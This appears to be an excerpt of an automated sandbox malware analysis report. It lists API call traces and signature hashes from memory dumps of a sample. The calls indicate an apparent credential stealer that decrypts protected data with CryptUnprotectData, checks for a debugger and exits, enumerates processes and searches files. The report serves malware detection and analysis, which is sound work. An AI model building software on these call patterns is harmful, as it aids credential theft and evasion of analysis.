                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                      • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                      • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                      • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                      APIs
                                      • memset.MSVCRT ref: 048CCBBA
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 048CCBD8
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 048CCBE3
                                      • memcpy.MSVCRT(?,?,?), ref: 048CCC79
                                      • lstrcat.KERNEL32(?,00420B47), ref: 048CCCAA
                                      • lstrcat.KERNEL32(?,00420B4B), ref: 048CCCBE
                                      • lstrcat.KERNEL32(?,00420B4E), ref: 048CCCDF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                      • Instruction ID: c93860f6eb1dd788acead2334ac125074984855308d024af855e676f2133cdfa
                                      • Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                      • Instruction Fuzzy Hash: 0B4153B4D04219DBDB10CF94DD89BEEBBB9BB44304F1046A9F509A7280D7746B84CF95
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                      • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                      • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID: eM
                                      • API String ID: 2579439406-4107679315
                                      • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                      • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                      • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                      • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID: >O@
                                      • API String ID: 4291131564-3498640338
                                      • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                      • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                      • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                      • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: 590399330c28825323d6c1b4aa49a85e9fd713c0f671facac9161dcd8624f6af
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: 66418B22E09BD9C5CB058F7445E02AEBFB26FE6210F5D42EAC49D1F382C774514AD3A5
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 048D7FD8
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 048D7FF0
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 048D8004
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 048D8059
                                      • LocalFree.KERNEL32(00000000), ref: 048D8119
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID:
                                      • API String ID: 3090951853-0
                                      • Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                      • Instruction ID: 174b74c9060f04c884c32ac6b8a99ba8e7ccb33287379b7e70725d38b721da38
                                      • Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                      • Instruction Fuzzy Hash: F5413F71942228ABDB28EB54DC98FEDB374FB58704F2046D9E50AE2190DBB46F84CF51
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 048DC109
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 048DC11E
                                      • UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 048DC129
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 048DC145
                                      • TerminateProcess.KERNEL32(00000000), ref: 048DC14C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                      • Instruction ID: c02812121e4b38f0b791d3457884242d7b2abe2db7ea8d9ab196bff2ffa9810e
                                      • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                      • Instruction Fuzzy Hash: AC21BFB8902214DFDB10DF69F885A883BB4FB08314F52857BE91897261E7B1A9858F1D
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 3657800372-0
                                      • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                      • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                      • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                      • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 048C7514
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048C751B
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 048C7548
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 048C756B
                                      • LocalFree.KERNEL32(?), ref: 048C7575
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                      • Instruction ID: 202ec8ac892eb196428b9aa673752933e5d35c01673e7f543f1a0cb66e151b42
                                      • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                      • Instruction Fuzzy Hash: 16010075A45308BBEB10DFE4DC45F9D7779AB44B04F108546FB05AA2C0D670AB008B55
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                      • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                      • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                      • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                      • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                      • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                      • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048D9A15
                                      • Process32First.KERNEL32(00420ACE,00000128), ref: 048D9A29
                                      • Process32Next.KERNEL32(00420ACE,00000128), ref: 048D9A3E
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 048D9A53
                                      • CloseHandle.KERNEL32(00420ACE), ref: 048D9A71
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                      • Instruction ID: 848d5f445997064afa18f102c189869a82e50e675f621a00a612103cdcd826ec
                                      • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                      • Instruction Fuzzy Hash: 49011EB6A05208EBCB20DFA4CD84BDDB7B9BB08700F004689E509D7240EB70AB80CF51
                                      APIs
                                      • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID: ,<A
                                      • API String ID: 123533781-3158208111
                                      • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                      • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                      • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                      • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 048CE809
                                      • StrCmpCA.SHLWAPI(?,004215F0), ref: 048CE859
                                      • StrCmpCA.SHLWAPI(?,004215F4), ref: 048CE86F
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048CEF46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID:
                                      • API String ID: 433455689-0
                                      • Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                      • Instruction ID: 23007cbc85e1cced6fbd3e3eb43ec1833df6f1de1aa481a212b5fdeeba28b96c
                                      • Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                      • Instruction Fuzzy Hash: 1012FE719022189AEB1CFB64DC94EED7335AB54208F604AED954BE6090EFF47B48CF52
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                      • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                      • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                      • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,048C543B,40000001,00000000,00000000,?,048C543B), ref: 048D92B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                      • Instruction ID: c9c5a97e72cb61f9e9a60d1958e65d49b7f9df522d5158de70cfa858e1de4cc2
                                      • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                      • Instruction Fuzzy Hash: 0B111FB0605208BFDB04CF54D844FAB33B9AF89714F00AA54F919CB250D771F941DB60
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4A6
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,048C51A5,00000000,?), ref: 048CA4B8
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4E1
                                      • LocalFree.KERNEL32(?,?,?,?,048C51A5,00000000,?), ref: 048CA4F6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                      • Instruction ID: 8eaea2c3e7bb307efb21ef8c9f327d6442d3def6a3f7ba1e0413e37165b6b6f5
                                      • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                      • Instruction Fuzzy Hash: 2411C074641208EFEB14CFA4DC95FAA77B6EB88704F208549FD159B290C7B2EA40CB50
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                      • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                      • LocalFree.KERNEL32(?), ref: 0040A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                      • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                      • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                      • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 048CA53B
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 048CA55A
                                      • memcpy.MSVCRT(?,?,?), ref: 048CA57D
                                      • LocalFree.KERNEL32(?), ref: 048CA58A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                      • String ID:
                                      • API String ID: 3243516280-0
                                      • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                      • Instruction ID: 5aa6461187c8053b8b013828d5eda81ca52f210ea18e7684bcf75d9dcb71eb83
                                      • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                      • Instruction Fuzzy Hash: FD118AB8A01209EFCB04DFA4D985AAEB7B5FF89300F108559FD1597390D770AA50CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
